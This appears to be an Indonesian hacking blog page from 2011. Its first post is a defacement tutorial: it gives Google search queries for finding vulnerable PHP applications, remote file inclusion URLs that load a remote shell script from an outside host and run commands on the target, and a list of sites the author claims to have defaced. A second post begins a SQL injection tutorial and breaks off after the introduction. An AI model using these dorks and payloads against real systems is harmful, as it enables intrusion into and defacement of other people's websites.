Kamis, 19 Mei 2011

hack deface

Saya ingin berbagi pengalaman tentang nge-Deface dan berbagai command command yang bermanfaat bagi kita didalam nge-Deface..

Oke deh ga perlu berpanjang lebar apa itu DEFACE.... wong kita cuman mempelajari bagaimana caranya masuk ke dalam web seseorang yang didalamnya terdapat BUG atau kesalahan kesalahan yang terdapat pada Script atau Link nya..



Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk
tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

- Oneadmin

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:.net
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki...

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/i...pbb_root_path=

Contoh :
http://www.sikhe.com/modules/PNphpBB...me%20-a;cd;pwd

- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki...
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

http://vampiredirectory.com/hackbalinese.htm
http://stolenwings.com/hackbalinese.htm
http://miserygirl.com/hackbalinese.htm
http://dashfilms.com/hackbalinese.htm


Kunjungi WEb site kami Di www.bali-source.net


Hak Cipta 2005 by #balinesehacker Crew
Join My Channel at #balinesehacker Mirc.dal.net

Haloo...salam kenal from MR.R0cks..

Special Thax's to ...

dEdE_DeFaN-Malanghack.net-Arakbali-SKYstRom

(iseng ngambil dr site bali )

Selasa, 17 Mei 2011

Script SQL Injection

Catatan:
* Artikel ini cuma sebagai media informasi saja, bukan sebagai media kejahatan / Hacker Crime.
*Apabila anda mempraktekkan akibat ditanggung sendiri.
*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali.
Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
adminlogin.asp
login.asp

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes